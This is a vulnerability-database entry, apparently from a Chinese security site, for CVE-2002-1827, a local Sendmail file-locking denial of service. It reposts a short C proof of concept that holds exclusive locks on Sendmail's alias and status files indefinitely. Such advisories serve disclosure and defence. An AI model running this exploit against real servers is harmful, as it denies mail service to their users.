Sendmail文件锁住机制拒绝服务攻击漏洞

Sendmail文件锁住机制拒绝服务攻击漏洞

漏洞ID 1106745 漏洞类型 其他
发布时间 2002-05-24 更新时间 2005-10-20
图片[1]-Sendmail文件锁住机制拒绝服务攻击漏洞-安全小百科CVE编号 CVE-2002-1827
图片[2]-Sendmail文件锁住机制拒绝服务攻击漏洞-安全小百科CNNVD-ID CNNVD-200212-826
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/21477
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-826
|漏洞详情
Sendmail是一款流行的免费开放源代码的邮件传输客户端,可运行在多种Unix和Linux操作系统下。Sendmail在处理文件锁住的操作上存在漏洞,可导致本地攻击者进行拒绝服务攻击。flock()函数可以对一个打开用来读取的文件加锁。fcntl()函数用来对一个打开写入的文件加锁,这样可以提供更好的保护。当一个进程对一个文件加锁以后,其它的进程将不能操作此文件。正常情况下程序对文件操作用那两个函数加锁,完成会后释放,如果攻击者程序构建恶意程序对sendmail相关文件一直加上锁而不释放,就可造成对sendmail程序或者相关程序操作不正常。
|漏洞EXP
source: http://www.securityfocus.com/bid/4822/info
 
Sendmail is a MTA for Unix and Linux variants.
 
There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation. 

#include <fcntl.h>
#include <unistd.h>

/*

Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.

More info: http://www.sendmail.org/LockingAdvisory.txt

zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com

*/

int main() {

  if(fork() == 0) {

    char *lock1 = "/etc/mail/aliases";
    char *lock2 = "/etc/mail/aliases.db";
    char *lock3 = "/var/log/sendmail.st";

    int fd;
    fd = open(lock1,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock2,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock3,O_RDONLY);
    flock(fd,0x02);

    /* We are here to stay! */

    for(;;) {}

  }
}
|参考资料

来源:www.sendmail.org
链接:http://www.sendmail.org/LockingAdvisory.txt
来源:BID
名称:4822
链接:http://www.securityfocus.com/bid/4822
来源:XF
名称:sendmail-file-locking-dos(9162)
链接:http://www.iss.net/security_center/static/9162.php
来源:NSFOCUS
名称:2854
链接:http://www.nsfocus.net/vulndb/2854

相关推荐: MyPHPSoft MyPHPLinks SQL Injection Administration Bypassing Vulnerability

MyPHPSoft MyPHPLinks SQL Injection Administration Bypassing Vulnerability 漏洞ID 1101171 漏洞类型 Design Error 发布时间 2002-12-14 更新时间 2002…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享